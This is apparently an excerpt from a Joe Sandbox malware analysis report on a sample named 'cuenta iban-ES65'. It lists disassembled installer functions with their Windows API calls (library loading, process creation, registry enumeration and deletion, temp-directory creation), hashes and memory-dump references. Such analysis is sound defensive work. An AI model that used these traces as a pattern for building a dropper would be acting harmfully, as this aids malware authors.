Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: b56f379d4c7718a716cd2f0f4935c5eaa8b38fc1cc2d991abe85072f08e57da9
Instruction ID: 557db050c0314b8bb5c0b22d2db4fc3530b60cfc711b7b252a141f8c1691c263
Opcode Fuzzy Hash: b56f379d4c7718a716cd2f0f4935c5eaa8b38fc1cc2d991abe85072f08e57da9
Instruction Fuzzy Hash: 82114272900109FFEF229F50DE89DAE3B7DEB54344B104436F901B10A0D7B59E51DB69

Uniqueness

Uniqueness Score: -1.00%

Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE

GlobalFree.KERNEL32(00000000), ref: 10001768
FreeLibrary.KERNEL32(?), ref: 100017DF
GlobalFree.KERNEL32(00000000), ref: 10001804

Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2

Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB

Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,10004010,00000000,10001695,00000000), ref: 10001572

Strings

, xrefs: 100017E5

Memory Dump Source

Source File: 00000000.00000002.13169077201.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.13169049421.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.13169106504.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.13169135539.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_cuenta iban-ES65.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: 676a92eb632660267f66b66a0e8313324764f953d5bc12d8e45a65eb3bf091b8
Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
Opcode Fuzzy Hash: 676a92eb632660267f66b66a0e8313324764f953d5bc12d8e45a65eb3bf091b8
Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60

Uniqueness

Uniqueness Score: -1.00%

Function 00401F90 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB

Part of subcall function 00404F25: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00000000,0078FCF8,773023A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
Part of subcall function 00404F25: lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00000000,0078FCF8,773023A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
Part of subcall function 00404F25: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00000000,0078FCF8,773023A0), ref: 00404F81
Part of subcall function 00404F25: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll), ref: 00404F93
Part of subcall function 00404F25: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
Part of subcall function 00404F25: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
Part of subcall function 00404F25: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 05c8e021a7a7f73ce592bb1d623faec27b59f04a76483d1fd0bf651fb880023d
Instruction ID: a6d6138a22214a2ec3127db012fcbe8ccdb9873b287714200ab65a7954d0c462
Opcode Fuzzy Hash: 05c8e021a7a7f73ce592bb1d623faec27b59f04a76483d1fd0bf651fb880023d
Instruction Fuzzy Hash: 93212B72904211EBDF217F648E4DAAE76B1AB45318F30423BF311B62D1C7BC4941DA6E

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00405817: CharNextA.USER32(?,?,Mundstykket.min,?,00405883,Mundstykket.min,Mundstykket.min,77303410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,77303410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405825
Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040582A
Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040583E

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605

Part of subcall function 004053EB: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040542E

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Disenthralls\Ethnogenist82,00000000,00000000,000000F0), ref: 00401634

Strings

C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Disenthralls\Ethnogenist82, xrefs: 00401629

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Disenthralls\Ethnogenist82
API String ID: 1892508949-3628409291
Opcode ID: 73aee729b28fb73f9d8e4b10f4e7109390eb8d9f0c8663a15968dc92b5e27352
Instruction ID: 6ea9d176647784ede47dca84986b1d8040ea6f7a989068fde2debc666839409d
Opcode Fuzzy Hash: 73aee729b28fb73f9d8e4b10f4e7109390eb8d9f0c8663a15968dc92b5e27352
Instruction Fuzzy Hash: A2112B35404141ABDF217B650C405BF27F0EA92315738463FF591B22E2C63C0942A63F

Uniqueness

Uniqueness Score: -1.00%

Function 0040549D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0079FD48,Error launching installer), ref: 004054C6
CloseHandle.KERNEL32(?), ref: 004054D3

Strings

Error launching installer, xrefs: 004054B0

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
Instruction ID: 542db3fa263e6c3fd8363e81c561fcb1d1edc85eb607383f0aa2fc0e1be44d1e
Opcode Fuzzy Hash: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
Instruction Fuzzy Hash: 95E0BFF4A002097FEB10AB64ED45F7B7BACEB00645F108561FD10F6190D674A9549A79

Uniqueness

Uniqueness Score: -1.00%

Function 00401E44 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00404F25: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00000000,0078FCF8,773023A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
Part of subcall function 00404F25: lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00000000,0078FCF8,773023A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
Part of subcall function 00404F25: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00000000,0078FCF8,773023A0), ref: 00404F81
Part of subcall function 00404F25: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll), ref: 00404F93
Part of subcall function 00404F25: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
Part of subcall function 00404F25: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
Part of subcall function 00404F25: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1

Part of subcall function 0040549D: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0079FD48,Error launching installer), ref: 004054C6
Part of subcall function 0040549D: CloseHandle.KERNEL32(?), ref: 004054D3

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: 4876c158792dead32ecf0166a33e69fc1182390f13c726ae77bf2af81063f083
Instruction ID: f3d89628ed1a2f536a51da31c0d1f3bff78da2cc26dd4d815c67a837da1bf94c
Opcode Fuzzy Hash: 4876c158792dead32ecf0166a33e69fc1182390f13c726ae77bf2af81063f083
Instruction Fuzzy Hash: 53016D31904114EBDF11AFA1CD89A9E7B72EF00344F10817BF601B52E1C7789A819B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00402482 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,0000057F,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003,00020019), ref: 004024C3
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsn876E.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024D8

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: cab775b8895c8a4c4f35b0b4981659a72946dee781d42c39cc8dfcfc307467ae
Instruction ID: 6b9a29d885729d806435ba0af982d5db400a82278970f5f8cd94cba27a839736
Opcode Fuzzy Hash: cab775b8895c8a4c4f35b0b4981659a72946dee781d42c39cc8dfcfc307467ae
Instruction Fuzzy Hash: EDF0AD72904200AFEB11AF659E88EBB7A6DEB80344B10443AF505A61C0D6B849449A7A

Uniqueness

Uniqueness Score: -1.00%

Function 100027E8 Relevance: 3.2, APIs: 2, Instructions: 156COMMON

Download Yara Rule

APIs

EnumWindows.USER32(00000000), ref: 100028A7
GetLastError.KERNEL32 ref: 100029AE

Memory Dump Source

Source File: 00000000.00000002.13169077201.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.13169049421.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.13169106504.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.13169135539.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_cuenta iban-ES65.jbxd

Similarity

API ID: EnumErrorLastWindows
String ID:
API String ID: 14984897-0
Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95

Uniqueness

Uniqueness Score: -1.00%

Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,0000057F,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C

RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 00402440
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsn876E.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024D8

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 9bc3e04273e98a6810bb149e060222757d35f34ba6d632a748a88059480f05af
Instruction ID: 3b61e3a0dd356b8eb8c6217664be55b6a4c5c12d426b24930886ed9b9a2887e1
Opcode Fuzzy Hash: 9bc3e04273e98a6810bb149e060222757d35f34ba6d632a748a88059480f05af
Instruction Fuzzy Hash: 5911A771905205EFDF14DF64CA889AEBBB4EF11348F20443FE141B62C0D2B84A45DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b63ad44f694a207690e677ec35bda8f999f5426b301403e6904e10af90410016
Instruction ID: 00097469377630013da62b9f7c31fbdee85021c234e60ac5accdaffcc3ed26dc
Opcode Fuzzy Hash: b63ad44f694a207690e677ec35bda8f999f5426b301403e6904e10af90410016
Instruction Fuzzy Hash: BE01F4316242209BF7194B389C04B6A3698E751354F10813BF811F62F1D678DC028B4D

Uniqueness

Uniqueness Score: -1.00%

Function 00402308 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,0000057F,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 00402327
RegCloseKey.ADVAPI32(00000000), ref: 00402330

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: f13fc71d1bfc05488ebc99773cab42a11541e056257782c7e60bd69959142faf
Instruction ID: 97ae11083f28a0faafd94fb7fe42009bced1e39793468f635283aee611ee1e77
Opcode Fuzzy Hash: f13fc71d1bfc05488ebc99773cab42a11541e056257782c7e60bd69959142faf
Instruction Fuzzy Hash: A2F04433A00110AFEB10BBA48A4EAAE7269AB50344F14443BF201B61C1DABD4D12966D

Uniqueness

Uniqueness Score: -1.00%

Function 0040155B Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(000103BA), ref: 00401579
ShowWindow.USER32(000103B4), ref: 0040158E

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
